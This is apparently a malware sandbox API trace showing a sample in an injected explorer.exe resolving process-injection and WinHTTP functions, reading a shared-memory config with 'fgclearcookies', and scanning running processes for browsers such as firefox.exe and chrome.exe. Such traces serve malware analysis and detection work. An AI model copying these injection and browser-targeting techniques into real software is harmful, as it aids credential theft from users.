hKey=0xffffffff80000002, lpSubKey="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f\\0", phkResult=0x1bf8d8 | out: phkResult=0x1bf8d8*=0xf8) returned 0x0 [0160.281] RegEnumKeyExW (in: hKey=0xf8, dwIndex=0x0, lpName=0x2b17f0, lpcchName=0x1bf8d0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x1bf8d0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0160.281] RegCloseKey (hKey=0xf8) returned 0x0 [0160.281] VirtualQuery (in: lpAddress=0x2b17f0, lpBuffer=0x1bf820, dwLength=0x30 | out: lpBuffer=0x1bf820*(BaseAddress=0x2b1000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.281] GetProcessHeap () returned 0x270000 [0160.281] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b17f0 | out: hHeap=0x270000) returned 1 [0160.281] VirtualQuery (in: lpAddress=0x2b1750, lpBuffer=0x1bf890, dwLength=0x30 | out: lpBuffer=0x1bf890*(BaseAddress=0x2b1000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.281] GetProcessHeap () returned 0x270000 [0160.281] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b1750 | out: hHeap=0x270000) returned 1 [0160.282] RegEnumKeyExW (in: hKey=0xf4, dwIndex=0x1, lpName=0x2b06a0, lpcchName=0x1bf940, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="0", lpcchName=0x1bf940, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0160.282] RegCloseKey (hKey=0xf4) returned 0x0 [0160.282] VirtualQuery (in: lpAddress=0x2b06a0, lpBuffer=0x1bf890, dwLength=0x30 | out: lpBuffer=0x1bf890*(BaseAddress=0x2b0000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.282] GetProcessHeap () returned 0x270000 [0160.282] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b06a0 | out: hHeap=0x270000) returned 1 [0160.282] VirtualQuery (in: lpAddress=0x2b0600, lpBuffer=0x1bf900, dwLength=0x30 | out: lpBuffer=0x1bf900*(BaseAddress=0x2b0000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.282] GetProcessHeap () returned 0x270000 [0160.282] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b0600 | out: hHeap=0x270000) returned 1 [0160.282] RegEnumKeyExW (in: hKey=0xf0, dwIndex=0x1, lpName=0x2af590, lpcchName=0x1bf9b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="965b7fc26dad90d340d2fa0a4879039f", lpcchName=0x1bf9b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0160.282] RegCloseKey (hKey=0xf0) returned 0x0 [0160.282] VirtualQuery (in: lpAddress=0x2af590, lpBuffer=0x1bf900, dwLength=0x30 | out: lpBuffer=0x1bf900*(BaseAddress=0x2af000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.282] GetProcessHeap () returned 0x270000 [0160.282] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2af590 | out: hHeap=0x270000) returned 1 [0160.282] VirtualQuery (in: lpAddress=0x2a1d60, lpBuffer=0x1bf970, dwLength=0x30 | out: lpBuffer=0x1bf970*(BaseAddress=0x2a1000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x12000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.282] GetProcessHeap () returned 0x270000 [0160.282] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1d60 | out: hHeap=0x270000) returned 1 [0160.282] RegEnumKeyExW (in: hKey=0xec, dwIndex=0x1, lpName=0x2ae580, lpcchName=0x1bfa20, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MaintenanceService", lpcchName=0x1bfa20, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0160.282] RegCloseKey (hKey=0xec) returned 0x0 [0160.282] VirtualQuery (in: lpAddress=0x2ae580, lpBuffer=0x1bf970, dwLength=0x30 | out: lpBuffer=0x1bf970*(BaseAddress=0x2ae000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.282] GetProcessHeap () returned 0x270000 [0160.282] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2ae580 | out: hHeap=0x270000) returned 1 [0160.283] CMemStm::Seek () returned 0x0 [0160.283] CMemStm::SetSize () returned 0x0 [0160.283] CMemStm::Seek () returned 0x0 [0160.283] CMemStm::Seek () returned 0x0 [0160.283] CMemStm::Seek () returned 0x0 [0160.283] CMemStm::Release () returned 0x0 [0160.284] CoUninitialize () [0160.286] RtlExitUserProcess (ExitCode=0x0) Process: id = "14" image_name = "explorer.exe" filename = "c:\\windows\\syswow64\\explorer.exe" page_root = "0x42c01000" os_pid = "0x92c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0xbdc" cmd_line = "C:\\Windows\\SysWOW64\\explorer.exe" cur_dir = "C:\\Windows\\SysWOW64\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 195 os_tid = 0x930 [0161.249] RtlInitAnsiString (in: DestinationString=0x28fae8, SourceString="ADVAPI32.dll" | out: DestinationString="ADVAPI32.dll") [0161.249] RtlAnsiStringToUnicodeString (in: DestinationString=0x28fae0, SourceString="ADVAPI32.dll", AllocateDestinationString=1 | out: DestinationString="ADVAPI32.dll") returned 0x0 [0161.249] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ADVAPI32.dll", BaseAddress=0x28fad8 | out: BaseAddress=0x28fad8*=0x74d40000) returned 0x0 [0161.251] RtlInitAnsiString (in: DestinationString=0x28fae8, SourceString="CryptHashData" | out: DestinationString="CryptHashData") [0161.252] LdrGetProcedureAddress (in: BaseAddress=0x74d40000, Name="CryptHashData", Ordinal=0x0, ProcedureAddress=0x28fadc | out: ProcedureAddress=0x28fadc*=0x74d4df36) returned 0x0 [0161.252] RtlInitAnsiString (in: DestinationString=0x28fae8, SourceString="CRYPT32.dll" | out: DestinationString="CRYPT32.dll") [0161.252] RtlAnsiStringToUnicodeString (in: DestinationString=0x28fae0, SourceString="CRYPT32.dll", AllocateDestinationString=1 | out: DestinationString="CRYPT32.dll") returned 0x0 [0161.252] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="CRYPT32.dll", BaseAddress=0x28fad8 | out: BaseAddress=0x28fad8*=0x759b0000) returned 0x0 [0161.331] RtlInitAnsiString (in: DestinationString=0x28fae8, SourceString="CryptBinaryToStringA" | out: DestinationString="CryptBinaryToStringA") [0161.331] LdrGetProcedureAddress (in: BaseAddress=0x759b0000, Name="CryptBinaryToStringA", Ordinal=0x0, ProcedureAddress=0x28fadc | out: ProcedureAddress=0x28fadc*=0x759ea8c5) returned 0x0 [0161.331] RtlInitAnsiString (in: DestinationString=0x28fae8, SourceString="DNSAPI.dll" | out: DestinationString="DNSAPI.dll") [0161.331] RtlAnsiStringToUnicodeString (in: DestinationString=0x28fae0, SourceString="DNSAPI.dll", AllocateDestinationString=1 | out: DestinationString="DNSAPI.dll") returned 0x0 [0161.331] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="DNSAPI.dll", BaseAddress=0x28fad8 | out: BaseAddress=0x28fad8*=0x74850000) returned 0x0 [0161.336] RtlInitAnsiString (in: DestinationString=0x28fae8, SourceString="DnsFree" | out: DestinationString="DnsFree") [0161.336] LdrGetProcedureAddress (in: BaseAddress=0x74850000, Name="DnsFree", Ordinal=0x0, ProcedureAddress=0x28fadc | out: ProcedureAddress=0x28fadc*=0x7485436b) returned 0x0 [0161.336] RtlInitAnsiString (in: DestinationString=0x28fae8, SourceString="KERNEL32.DLL" | out: DestinationString="KERNEL32.DLL") [0161.336] RtlAnsiStringToUnicodeString (in: DestinationString=0x28fae0, SourceString="KERNEL32.DLL", AllocateDestinationString=1 | out: DestinationString="KERNEL32.DLL") returned 0x0 [0161.337] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="KERNEL32.DLL", BaseAddress=0x28fad8 | out: BaseAddress=0x28fad8*=0x76c20000) returned 0x0 [0161.337] RtlInitAnsiString (in: DestinationString=0x28fae8, SourceString="LoadLibraryA" | out: DestinationString="LoadLibraryA") [0161.337] LdrGetProcedureAddress (in: BaseAddress=0x76c20000, Name="LoadLibraryA", Ordinal=0x0, ProcedureAddress=0x28fadc | out: ProcedureAddress=0x28fadc*=0x76c349d7) returned 0x0 [0161.337] RtlInitAnsiString (in: DestinationString=0x28fae8, SourceString="GetProcAddress" | out: DestinationString="GetProcAddress") [0161.337] LdrGetProcedureAddress (in: BaseAddress=0x76c20000, Name="GetProcAddress", Ordinal=0x0, ProcedureAddress=0x28fadc | out: ProcedureAddress=0x28fadc*=0x76c31222) returned 0x0 [0161.337] RtlInitAnsiString (in: DestinationString=0x28fae8, SourceString="VirtualProtect" | out: DestinationString="VirtualProtect") [0161.337] LdrGetProcedureAddress (in: BaseAddress=0x76c20000, Name="VirtualProtect", Ordinal=0x0, ProcedureAddress=0x28fadc | out: ProcedureAddress=0x28fadc*=0x76c3435f) returned 0x0 [0161.337] RtlInitAnsiString (in: DestinationString=0x28fae8, SourceString="ntdll.dll" | out: DestinationString="ntdll.dll") [0161.337] RtlAnsiStringToUnicodeString (in: DestinationString=0x28fae0, SourceString="ntdll.dll", AllocateDestinationString=1 | out: DestinationString="ntdll.dll") returned 0x0 [0161.337] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ntdll.dll", BaseAddress=0x28fad8 | out: BaseAddress=0x28fad8*=0x77130000) returned 0x0 [0161.337] RtlInitAnsiString (in: DestinationString=0x28fae8, SourceString="NtCreateSection" | out: DestinationString="NtCreateSection") [0161.337] LdrGetProcedureAddress (in: BaseAddress=0x77130000, Name="NtCreateSection", Ordinal=0x0, ProcedureAddress=0x28fadc | out: ProcedureAddress=0x28fadc*=0x7714ff94) returned 0x0 [0161.337] RtlInitAnsiString (in: DestinationString=0x28fae8, SourceString="SHELL32.dll" | out: DestinationString="SHELL32.dll") [0161.337] RtlAnsiStringToUnicodeString (in: DestinationString=0x28fae0, SourceString="SHELL32.dll", AllocateDestinationString=1 | out: DestinationString="SHELL32.dll") returned 0x0 [0161.337] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="SHELL32.dll", BaseAddress=0x28fad8 | out: BaseAddress=0x28fad8*=0x75fd0000) returned 0x0 [0161.337] RtlInitAnsiString (in: DestinationString=0x28fae8, SourceString="SHGetSpecialFolderPathW" | out: DestinationString="SHGetSpecialFolderPathW") [0161.337] LdrGetProcedureAddress (in: BaseAddress=0x75fd0000, Name="SHGetSpecialFolderPathW", Ordinal=0x0, ProcedureAddress=0x28fadc | out: ProcedureAddress=0x28fadc*=0x75ff0468) returned 0x0 [0161.338] RtlInitAnsiString (in: DestinationString=0x28fae8, SourceString="SHLWAPI.dll" | out: DestinationString="SHLWAPI.dll") [0161.338] RtlAnsiStringToUnicodeString (in: DestinationString=0x28fae0, SourceString="SHLWAPI.dll", AllocateDestinationString=1 | out: DestinationString="SHLWAPI.dll") returned 0x0 [0161.338] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="SHLWAPI.dll", BaseAddress=0x28fad8 | out: BaseAddress=0x28fad8*=0x75340000) returned 0x0 [0161.338] RtlInitAnsiString (in: DestinationString=0x28fae8, SourceString="StrToIntA" | out: DestinationString="StrToIntA") [0161.338] LdrGetProcedureAddress (in: BaseAddress=0x75340000, Name="StrToIntA", Ordinal=0x0, ProcedureAddress=0x28fadc | out: ProcedureAddress=0x28fadc*=0x7536cd65) returned 0x0 [0161.338] RtlInitAnsiString (in: DestinationString=0x28fae8, SourceString="USER32.dll" | out: DestinationString="USER32.dll") [0161.338] RtlAnsiStringToUnicodeString (in: DestinationString=0x28fae0, SourceString="USER32.dll", AllocateDestinationString=1 | out: DestinationString="USER32.dll") returned 0x0 [0161.338] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="USER32.dll", BaseAddress=0x28fad8 | out: BaseAddress=0x28fad8*=0x74f40000) returned 0x0 [0161.338] RtlInitAnsiString (in: DestinationString=0x28fae8, SourceString="wsprintfW" | out: DestinationString="wsprintfW") [0161.338] LdrGetProcedureAddress (in: BaseAddress=0x74f40000, Name="wsprintfW", Ordinal=0x0, ProcedureAddress=0x28fadc | out: ProcedureAddress=0x28fadc*=0x74f7e061) returned 0x0 [0161.338] RtlInitAnsiString (in: DestinationString=0x28fae8, SourceString="WINHTTP.dll" | out: DestinationString="WINHTTP.dll") [0161.339] RtlAnsiStringToUnicodeString (in: DestinationString=0x28fae0, SourceString="WINHTTP.dll", AllocateDestinationString=1 | out: DestinationString="WINHTTP.dll") returned 0x0 [0161.339] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="WINHTTP.dll", BaseAddress=0x28fad8 | out: BaseAddress=0x28fad8*=0x747f0000) returned 0x0 [0161.341] RtlInitAnsiString (in: DestinationString=0x28fae8, SourceString="WinHttpOpen" | out: DestinationString="WinHttpOpen") [0161.341] LdrGetProcedureAddress (in: BaseAddress=0x747f0000, Name="WinHttpOpen", Ordinal=0x0, ProcedureAddress=0x28fadc | out: ProcedureAddress=0x28fadc*=0x747f58b9) returned 0x0 [0161.341] RtlInitAnsiString (in: DestinationString=0x28fae8, SourceString="WS2_32.dll" | out: DestinationString="WS2_32.dll") [0161.341] RtlAnsiStringToUnicodeString (in: DestinationString=0x28fae0, SourceString="WS2_32.dll", AllocateDestinationString=1 | out: DestinationString="WS2_32.dll") returned 0x0 [0161.341] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="WS2_32.dll", BaseAddress=0x28fad8 | out: BaseAddress=0x28fad8*=0x75bc0000) returned 0x0 [0161.341] LdrGetProcedureAddress (in: BaseAddress=0x75bc0000, Name=0x0, Ordinal=0xc, ProcedureAddress=0x28fadc | out: ProcedureAddress=0x28fadc*=0x75bcb131) returned 0x0 [0161.342] LdrProcessRelocationBlock (Address=0x79000, Count=0x2, TypeOffset=0x7b264, Delta=0xf0070000) returned 0x7b268 [0161.343] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0161.343] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0161.344] GetProcAddress (hModule=0x76c20000, lpProcName="ReadProcessMemory") returned 0x76c4cfcc [0161.376] GetProcAddress (hModule=0x76c20000, lpProcName="LeaveCriticalSection") returned 0x77152270 [0161.376] GetProcAddress (hModule=0x76c20000, lpProcName="TerminateProcess") returned 0x76c4d802 [0161.377] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32Next") returned 0x76cb5c3f [0161.377] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0161.377] GetProcAddress (hModule=0x76c20000, lpProcName="ExitThread") returned 0x7718d598 [0161.377] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0161.377] GetProcAddress (hModule=0x76c20000, lpProcName="RtlMoveMemory") returned 0x77193c40 [0161.377] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0161.377] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiA") returned 0x76c33e8e [0161.377] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0161.377] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0161.378] GetProcAddress (hModule=0x76c20000, lpProcName="EnterCriticalSection") returned 0x771522b0 [0161.378] GetProcAddress (hModule=0x76c20000, lpProcName="FindClose") returned 0x76c34442 [0161.378] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0161.378] GetProcAddress (hModule=0x76c20000, lpProcName="OpenThread") returned 0x76c41248 [0161.378] GetProcAddress (hModule=0x76c20000, lpProcName="Process32Next") returned 0x76c588a4 [0161.378] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32First") returned 0x76cb5b93 [0161.378] GetProcAddress (hModule=0x76c20000, lpProcName="IsWow64Process") returned 0x76c3195e [0161.378] GetProcAddress (hModule=0x76c20000, lpProcName="RemoveDirectoryW") returned 0x76cb44cf [0161.378] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0161.378] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleA") returned 0x76c31245 [0161.379] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatW") returned 0x76c5828e [0161.379] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexA") returned 0x76c34c6b [0161.379] GetProcAddress (hModule=0x76c20000, lpProcName="FindNextFileW") returned 0x76c354ee [0161.379] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0161.379] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0161.379] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0161.379] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0161.379] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteFileW") returned 0x76c389b3 [0161.379] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0161.380] GetProcAddress (hModule=0x76c20000, lpProcName="OpenFileMappingA") returned 0x76c34c1b [0161.380] GetProcAddress (hModule=0x76c20000, lpProcName="WriteProcessMemory") returned 0x76c4d9e0 [0161.380] GetProcAddress (hModule=0x76c20000, lpProcName="SuspendThread") returned 0x76c57d7e [0161.380] GetProcAddress (hModule=0x76c20000, lpProcName="SetFileAttributesW") returned 0x76c4d4f7 [0161.380] GetProcAddress (hModule=0x76c20000, lpProcName="ResumeThread") returned 0x76c343ef [0161.380] GetProcAddress (hModule=0x76c20000, lpProcName="RtlZeroMemory") returned 0x77193c10 [0161.380] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcess") returned 0x76c31986 [0161.380] GetProcAddress (hModule=0x76c20000, lpProcName="CreateRemoteThread") returned 0x76cb416b [0161.380] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSection") returned 0x77162c42 [0161.380] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0161.381] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0161.381] GetProcAddress (hModule=0x76c20000, lpProcName="Process32First") returned 0x76c58ae7 [0161.381] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0161.381] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0161.381] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualQuery") returned 0x76c3445a [0161.381] GetProcAddress (hModule=0x76c20000, lpProcName="UnmapViewOfFile") returned 0x76c31826 [0161.381] GetProcAddress (hModule=0x76c20000, lpProcName="MapViewOfFile") returned 0x76c318f1 [0161.381] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0161.381] GetProcAddress (hModule=0x76c20000, lpProcName="FindFirstFileW") returned 0x76c34435 [0161.381] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0161.382] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0161.382] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0161.382] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0161.382] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0161.382] GetProcAddress (hModule=0x74d40000, lpProcName="CryptGetHashParam") returned 0x74d4df7e [0161.382] GetProcAddress (hModule=0x74d40000, lpProcName="CryptCreateHash") returned 0x74d4df4e [0161.382] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0161.382] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0161.382] GetProcAddress (hModule=0x759b0000, lpProcName="CryptBinaryToStringA") returned 0x759ea8c5 [0161.382] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0161.383] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0161.383] GetProcAddress (hModule=0x74850000, lpProcName="DnsQuery_W") returned 0x7486572c [0161.383] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0161.383] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0161.383] GetProcAddress (hModule=0x77130000, lpProcName="NtSetInformationProcess") returned 0x7714fb18 [0161.383] GetProcAddress (hModule=0x77130000, lpProcName="NtMapViewOfSection") returned 0x7714fc40 [0161.383] GetProcAddress (hModule=0x77130000, lpProcName="LdrProcessRelocationBlock") returned 0x771de9cf [0161.383] GetProcAddress (hModule=0x77130000, lpProcName="NtUnmapViewOfSection") returned 0x7714fc70 [0161.383] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75fd0000 [0161.383] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetSpecialFolderPathW") returned 0x75ff0468 [0161.383] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x75340000 [0161.384] GetProcAddress (hModule=0x75340000, lpProcName="PathFindFileNameA") returned 0x753500aa [0161.384] GetProcAddress (hModule=0x75340000, lpProcName="StrToIntA") returned 0x7536cd65 [0161.384] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0161.384] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0161.384] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfA") returned 0x74f6ae5f [0161.384] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0161.384] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpAddRequestHeaders") returned 0x74809dfb [0161.384] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReadData") returned 0x747fcb9e [0161.384] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCrackUrl") returned 0x7480953a [0161.385] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetProxyForUrl") returned 0x747fd5dc [0161.385] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpenRequest") returned 0x747f4aea [0161.385] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0161.385] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCloseHandle") returned 0x747f2c01 [0161.385] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSetOption") returned 0x747f3f6c [0161.385] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReceiveResponse") returned 0x747fb262 [0161.385] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpConnect") returned 0x747fd9f5 [0161.385] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSendRequest") returned 0x747f79bd [0161.385] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7480257e [0161.385] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0161.386] GetProcAddress (hModule=0x75bc0000, lpProcName=0xc) returned 0x75bcb131 [0161.387] VirtualProtect (in: lpAddress=0x70000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x28fbe4 | out: lpflOldProtect=0x28fbe4*=0x40) returned 1 [0161.387] VirtualProtect (in: lpAddress=0x70000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x28fbe4 | out: lpflOldProtect=0x28fbe4*=0x4) returned 1 [0161.388] VirtualQuery (in: lpAddress=0x802cd, lpBuffer=0x28fbdc, dwLength=0x1c | out: lpBuffer=0x28fbdc*(BaseAddress=0x80000, AllocationBase=0x80000, AllocationProtect=0x40, RegionSize=0x6000, State=0x1000, Protect=0x40, Type=0x40000)) returned 0x1c [0161.389] GetProcessHeap () returned 0x8d0000 [0161.389] RtlAllocateHeap (HeapHandle=0x8d0000, Flags=0x8, Size=0x364) returned 0x8f3fe8 [0161.389] RtlMoveMemory (in: Destination=0x8f3fe8, Source=0x802cd, Length=0x363 | out: Destination=0x8f3fe8) [0161.389] GetProcessHeap () returned 0x8d0000 [0161.389] RtlAllocateHeap (HeapHandle=0x8d0000, Flags=0x8, Size=0x2a00) returned 0x8f4358 [0161.389] RtlMoveMemory (in: Destination=0x8f4358, Source=0x8062f, Length=0x2a00 | out: Destination=0x8f4358) [0161.389] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x802cd) returned 0x0 [0161.389] GetProcessHeap () returned 0x8d0000 [0161.389] RtlAllocateHeap (HeapHandle=0x8d0000, Flags=0x8, Size=0xa000) returned 0x8f6d60 [0161.390] GetProcessHeap () returned 0x8d0000 [0161.390] RtlAllocateHeap (HeapHandle=0x8d0000, Flags=0x8, Size=0x2b) returned 0x8f3490 [0161.390] wsprintfA (in: param_1=0x8f3490, param_2="%s%s" | out: param_1="604954A450752B96B72CF2C4FA84486C9C354B42FF") returned 42 [0161.390] OpenFileMappingA (dwDesiredAccess=0x6, bInheritHandle=0, lpName="604954A450752B96B72CF2C4FA84486C9C354B42FF") returned 0xe8 [0161.390] MapViewOfFile (hFileMappingObject=0xe8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x400000 [0161.390] lstrlenA (lpString="plugin_size=290955") returned 18 [0161.390] lstrlenA (lpString="fgclearcookies") returned 14 [0161.390] UnmapViewOfFile (lpBaseAddress=0x400000) returned 1 [0161.391] CloseHandle (hObject=0xe8) returned 1 [0161.391] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0161.394] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0161.394] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0161.396] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0161.396] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0161.396] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0161.396] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0161.396] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0161.397] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0161.397] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0161.397] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0161.397] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0161.397] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0161.397] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0161.397] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0161.397] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 